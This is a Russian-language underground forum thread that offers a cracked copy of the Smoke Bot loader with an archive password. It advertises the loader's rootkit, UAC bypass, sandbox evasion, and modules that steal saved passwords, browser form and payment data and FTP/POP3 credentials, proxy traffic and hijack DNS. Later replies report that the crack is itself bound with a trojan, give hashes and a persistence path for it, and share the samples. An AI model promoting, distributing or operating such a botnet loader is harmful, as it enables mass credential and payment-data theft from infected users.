Smoke Bot Loader # Cracked

Kairos

Пользователь

Kairos не предоставил(а) никакой дополнительной информации.
Smoke Bot Loader
Преимущества:
- наличие модулей-плагинов, которые расширяют функционал бота, при этом не влияют на размер бота
- подробная статистика по версия системы, странам и онлайну
- подробная статистика по заданиям, загрузки / запуски, ограничение на количество и т.п.
- задания для бота на загрузку EXE или DLL (LoadLibrary, regsvr32)
- гео-таргетинг (выборочные загрузки только для конкретных стран или блокировка для определенных стран)
- загрузка задания с удаленного URL
- индивидуальное задание для каждого бота и поиск ботов по ID, стране или префиксу селлера
- незаметная установка в системе, защита собственных файлов и записей в реестре *
- самообновление бота через админку (локально или удаленно) *
- резервный URL для остука *
- возможность использования перфиксов для селлеров (более точная статистика и разделение заданий)
- статистика по повторным запускам (удобно для оценки качества загрузок или трафика) *
- "гостевой" доступ к статистике заданий
- антиотладка, антиэмуляция, детектирование "песочниц" и виртуальных машин
- легок в криптовании (не содержит в себе дополнительных DLL, оверлеев, TLS, всего одна секция кода)
- ring-3 rootkit, скрывает процесс, файлы и записи в реестре от пользователя, только для х32 систем
- работа в Windows XP-8 x32/x64
- небольшой размер лоадера ~ 7-14 Кб **

* - только для резидентной версии
** - в зависимости от версии

Модули:
- модуль (две версии) в виде граббера паролей известных программ для работы с сетью (IM клиенты, браузеры, FTP, Mail и покерные программы и др.), все пароли собираются и отсылаются в админку, откуда их можно легко скачать

Функционал граббера LITE:
- FTP клиенты
Code:
32bit FTP, BitKinex, BulletProof FTP Client, Classic FTP, CoffeeCup FTP, Core FTP, CuteFTP, Directory Opus, ExpanDrive, FAR Manager FTP, FFFTP, FileZilla, FlashFXP, Fling, FreeFTP/DirectFTP, Frigate3 FTP, FTP Commander, FTP Control, FTP Explorer, FTP Navigator, FTP Uploader, FTPRush, LeapFTP, NetDrive, SecureFX, SmartFTP, SoftX FTP Client, TurboFTP, UltraFXP, WebDrive, WebSitePublisher, Windows/Total Commander, WinSCP, WS_FTP
- Браузеры
Code:
Apple Safari, Flock, Google Chrome, Internet Explorer, Mozilla Browser, Mozilla Firefox, Mozilla Thunderbird, Opera, SeaMonkey
- Dialers & RDP
- Downloaders

Функционал граббера FULL:
- Все возможности LITE
- IM клиенты
Code:
&RQ, AIM Pro, Digsby, Excite Private Messenger, Faim, GAIM, Gizmo Project, Google Talk, ICQ/AIM, ICQ2003/Lite, ICQ99b-2002, IM2 (Messenger 2), JAJC, Miranda, MSN Messenger, MySpaceIM, Odigo, Paltalk, Pandion, Pidgin, PSI, QIP, QIP.Online, SIM, Trillian, Trillian Astra, Windows Live Messenger, Yahoo! Messenger
- Poker клиенты
Code:
Absolute Poker, Cake Poker, Full Tilt Poker, Party Poker, PokerStars, Titan Poker
- Mail клиенты
Code:
Becky Internet Mail, Eudora, Forte Agent, Gmail Notifier, Group Mail Free, IncrediMail, Mail Commander, Mail.Ru Agent, Outlook, PocoMail, POP Peeper, Scribe, The Bat!, Vypress Auvis, Windows Live Mail
- SOCKS - позволяет использовать ботов в качестве Socks5 Proxy (не бекконект, не обходит NAT), имеется возможность ограничить доступ по IP

- HOSTS - подмена IP-адресов для определенных сайтов через hosts-файл

- CMD SHELL - бесплатный модуль, доступный всем владельцам резидентной версии бота, позволяет выполнить консольное приложение, результат работы которой отправляется админку, например - "ipconfig /all"

- FORM GRAB - формграббер, работающий в реальном времени с браузерами (IE, FF, Opera, Chrome), перехватываются все POST запросы форм (авторизации, платежные данные и т.п), поддержка HTTPS, поиск в админке по части URL

- PASS SNIF - сниффер паролей, работающий в реальном времени со всеми приложениями, умеет перехватывать пароли от FTP и POP3, данные отправляются в админку

- FAKE DNS - продвинутая подмена DNS, работает в реальном времени со всеми приложениями, позволяет изменить IP-адрес для домена согласно правилу, которое задается в админке в виде: site.ru=127.0.0.1

Обходы:
UAC Vista/Win7/Win8 - отлично работает даже на ограниченных учетках
Резидентная версия бота имеет улучшенный вариант **, который на данный момент обходит большинство проактивных защит.

Комплектация:
- лоадер
- билдер префиксов для "селлеров"
- админка (PHP, MySQL)
- модули (при их покупке)
- парсер логов LITE/FULL граббера с инструкцией
| |
пароль: Lab​
 
Последнее редактирование:

Kotun

Участник

Kotun не предоставил(а) никакой дополнительной информации.
Админ , крыс почему не банишь ?

проблема с загрузкой гифа. - см ссыль --->>>

FiduH.gif


JJJJTTT.jpg
Безымянный проект.gif
 
Последнее редактирование:

Adidas

Пользователь

Adidas не предоставил(а) никакой дополнительной информации.
А какого года кряк? Ктото проверял на клей и прочее?
 

Kotun

Участник

Kotun не предоставил(а) никакой дополнительной информации.
Какие крысы, ты о чем?
зы : не ТЫ , а ВЫ !
зыы : Админу призвано - банить троянщегоф , а не лайкать их темы.
зыыы : если юзер выложил склейку на форум не проверив на клей - юзер считается крысой и ловит перманент ,
или я не прав ?

Спешил фор Админс *( если скрина мало ) : --->>>

--->>>> смотри внимательно ---->>>>

и да , не мой косяк за то ранее .

hhhhtttttjjjjjiiii.jpg
 
зы : не ТЫ , а ВЫ !
зыы : Админу призвано - банить троянщегоф , а не лайкать их темы.
зыыы : если юзер выложил склейку на форум не проверив на клей - юзер считается крысой и ловит перманент ,
или я не прав ?

Спешил фор Админс *( если скрина мало ) : --->>>

--->>>> смотри внимательно ---->>>>

и да , не мой косяк за то ранее .

Посмотреть вложение 447
Ты, то есть Вы сударь умных книжек начитались или где выхватили сие правило?
Если идет копипаст, слив и т.п. то почему человек крыса, если он не создатель данной склейки?
Для этого темы и открыты, именно для обсуждения того, что тут есть, выявления склеек, ошибок и т.п.
Вот если пользователь селлер или кодер, продает свой малварь со склейкой, то тут бы я согласился, что крыса.
Если у тебя есть пруфы того, что он склеил данный малварь, то представь и тогда он улетит в вечный бан. Если получается ты его оскорбил напрасно, то надеюсь ты возьмешь свои слова обратно и извинишься перед ним.

Админ не обязан сидеть и все малвари, программы, експлоиты и все остальное проверять, помимо этого работы хватает.

Вот ты нашел в данной теме какие-то склейки, распиши значит об этом или можешь "почищенный" малварь скинуть сюда с просьбой обновить тему.
Вот это будет реальная помощь форуму, тем более молодому а не зарабатывать Медали (За троллинг пользователей или Вынос мозга) которыи на днях у нас появятся))
Ну и так же, скорее всего уже сегодня появятся основные правила форума.

P.S. Надо помогать работать друг другу а не мозги делать.
 

Kotun

Участник

Kotun не предоставил(а) никакой дополнительной информации.
Админ.
Я не пришёл на форум делать кому то мозги.
Я указал на факт !
А фактом является то , что юзер выложил софтину на форум , и НЕ удосужился её проверить на клей !
Более того ; ни кто из руководящего звена не соизволил проверить сие творение на клей .
но дружно пролайкать - не применули !
Умные книжки я читал когда Ваши родители ещё друг друга не знали , так то...
Про помощь форуму : а разве мой месседж и потраченное время на билд клипа и залив оного на хостинг,
для всеобщего лицезрения не есть помощь форуму и предостережение остальных мемберов от заразы ?
Или я что то не так понимаю в этой жизни ?

И да :

Выложенная ТС-ом дрянь - есть склейка ,
которая расклеивается в папку TEMP и от туда уже оба файла выполняют возложенные на них функции.
Желающие могут скачать и найти дропнутое добро в папке TEMP ,
если со зрением плохо и лень посмотреть клип и скрин .

JJJJTTT.jpg

и да : иными словами я могу щаз выложить тут склейку и объяснить своё рвение тем ,
что я не в курсе по поводу склейки и ваще взял всё на закрытом турецком борде ?
Лол .
Админ может и не обязан всё мониторить , а вот - Модераторы на что ?
Модераторы должны не приват сплойты выклянчивать на проверку , а модерировать форум !
То есть модерировать ВСЕ темы и все файлы выкладываемые мемберами на борде !
Ибо ламеру качнувшему склейку - будет глубоко по *ую кто и что выложил .
Для ламера будет --->>> на даркнете выкладывают склейки !!!
Вот так будет для ламера...
Имхо.
 
Админ.
Я не пришёл на форум делать кому то мозги.
Я указал на факт !
А фактом является то , что юзер выложил софтину на форум , и НЕ удосужился её проверить на клей !
Более того ; ни кто из руководящего звена не соизволил проверить сие творение на клей .
но дружно пролайкать - не применули !
Умные книжки я читал когда Ваши родители ещё друг друга не знали , так то...
Про помощь форуму : а разве мой месседж и потраченное время на билд клипа и залив оного на хостинг,
для всеобщего лицезрения не есть помощь форуму и предостережение остальных мемберов от заразы ?
Или я что то не так понимаю в этой жизни ?

И да :

Выложенная ТС-ом дрянь - есть склейка ,
которая расклеивается в папку TEMP и от туда уже оба файла выполняют возложенные на них функции.
Желающие могут скачать и найти дропнутое добро в папке TEMP ,
если со зрением плохо и лень посмотреть клип и скрин .

Посмотреть вложение 449

и да : иными словами я могу щаз выложить тут склейку и объяснить своё рвение тем ,
что я не в курсе по поводу склейки и ваще взял всё на закрытом турецком борде ?
Лол .
Админ может и не обязан всё мониторить , а вот - Модераторы на что ?
Модераторы должны не приват сплойты выклянчивать на проверку , а модерировать форум !
То есть модерировать ВСЕ темы и все файлы выкладываемые мемберами на борде !
Ибо ламеру качнувшему склейку - будет глубоко по *ую кто и что выложил .
Для ламера будет --->>> на даркнете выкладывают склейки !!!
Вот так будет для ламера...
Имхо.
Спасибо, что указал на склейку, другие пользователи уже будут видеть и знать, возможно найдется и такой, кто очистить данный малварь от "лишнего" и будет всем счастье.

P.S. Ну если у меня уже два внука, то представляю какого Вы возраста))))
 

Kotun

Участник

Kotun не предоставил(а) никакой дополнительной информации.
P.S. Ну если у меня уже два внука, то представляю какого Вы возраста))))
Я при Лёне школу закончил .
Это тот Лёня , который Брежнев.
И ещё чего многого я успел при нём....

Темы не вижу про предложения по улучшению форума .

Ещё одно "НО"

На форуме у юзера под аваторкой виден емайл .
Сие действо есть великое палево на фоне всевозможных сервисов по пробиву и вскрытию мыльников.

так у меня :dance2::

111111111111.jpg

а вот так у юзеров :mosking: :

Посмотреть вложение 451

МайлСру Не ломает только ленивый.
а получив доступ к мыльнику , взломщик получает доступ к форуму и аккаунту ,
возможно , уважаемого юзера , которому всецело доверяют.
И получается что модератор - в теории , может выложить малварь ( не сам и при помощи взломщика. )
Тот факт что многие юзают одну и туже почту для всего - поможет идентефицировать ,
а возможно в дальнейшем и шантажировать владельца мыла.

Админ , ты же сам читал про maza-in а ...
Там именно через мыло и протекло так то....


живой пример : ---->>>
Пожалуйста , Вход или Регистрация чтобы увидеть ссылку!

смотрим мой ответ дитятке ( внизу страницы )
 
Последнее редактирование:
Я при Лёне школу закончил .
Это тот Лёня , который Брежнев.
И ещё чего многого я успел при нём....

Темы не вижу про предложения по улучшению форума .

Ещё одно "НО"

На форуме у юзера под аваторкой виден емайл .
Сие действо есть великое палево на фоне всевозможных сервисов по пробиву и вскрытию мыльников.

так у меня :dance2::

Посмотреть вложение 450

а вот так у юзеров :mosking: :

Посмотреть вложение 451

МайлСру Не ломает только ленивый.
а получив доступ к мыльнику , взломщик получает доступ к форуму и аккаунту ,
возможно , уважаемого юзера , которому всецело доверяют.
И получается что модератор - в теории , может выложить малварь ( не сам и при помощи взломщика. )
Тот факт что многие юзают одну и туже почту для всего - поможет идентефицировать ,
а возможно в дальнейшем и шантажировать владельца мыла.

Админ , ты же сам читал про maza-in а ...
Там именно через мыло и протекло так то....


живой пример : ---->>>
Пожалуйста , Вход или Регистрация чтобы увидеть ссылку!

смотрим мой ответ дитятке ( внизу страницы )
У нас отключена функция восстановление пароля по мылу. Щас еще разберусь, как вообще это поле сделать не обязательным.
Восстановление пароля будет только в ручном режиме.
 

Samael666

Пользователь

Samael666 не предоставил(а) никакой дополнительной информации.
Почитал данную тему и регнулся, спасибо за хорошее настроение)
Я конечно не такой древний как вы, но Горбатого помню..
Не оч понятна идея протроянивания коллег по цеху, какой профит..
 

Adidas

Пользователь

Adidas не предоставил(а) никакой дополнительной информации.
Посмотреть вложение 449

Походу дела у кебаб вирус вшит в этот билдер, склейку я не увидел через софт, еще и пишет что не запускать его на виртуалке и деде, а только на реальном компе.
 

Samael666

Пользователь

Samael666 не предоставил(а) никакой дополнительной информации.
Немного о склейке -
Все файлы накрыты VMP.
SmokeBuilder by KebabMan.exe - MD5 6A554715E93E5910DE7BC6D599C22F77
Дропает 2 файла в Temp -
1 файл - SmokeBuilder by KebabMan.exe - MD5 7661AB6304995EE7C1DB1F94C9131693
(этот билдер когда то я скачивал с 0dayexploits, без явной склейки на функционал/ левый отстук я толком не проверял, кажется билдил..)
2 файл (полезная нагрузка) - MD5 65890181506C953D408087DCA4E10AF2
Ждет пару минут затем дропается из Temp в Roaming затем инжектится в svchost.exe , ну и в авторан добавляется -
Найдено в: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\
Путь: C:\Users\Admin\AppData\Roaming\Steam Extensions.exe
Куда стучит не перехватывал.
Если кому интересно подробнее о полезной нагрузке -

Файлы - Билдер+склейка, билдер без склейки, полезная нагрузка, можно скачать -
Link -
PASS - infected
 

Samael666

Пользователь

Samael666 не предоставил(а) никакой дополнительной информации.
хз)
Вот архив который у меня..
PASS - infected
==================================================
PS В сообщении 16 у меня ошибка, заметил, но уже не мог редактировать..
Билдер "SmokeBuilder by KebabMan.exe" MD5 7661AB6304995EE7C1DB1F94C9131693 - не накрыт VMP, все остальное VMP.
 
Сверху Снизу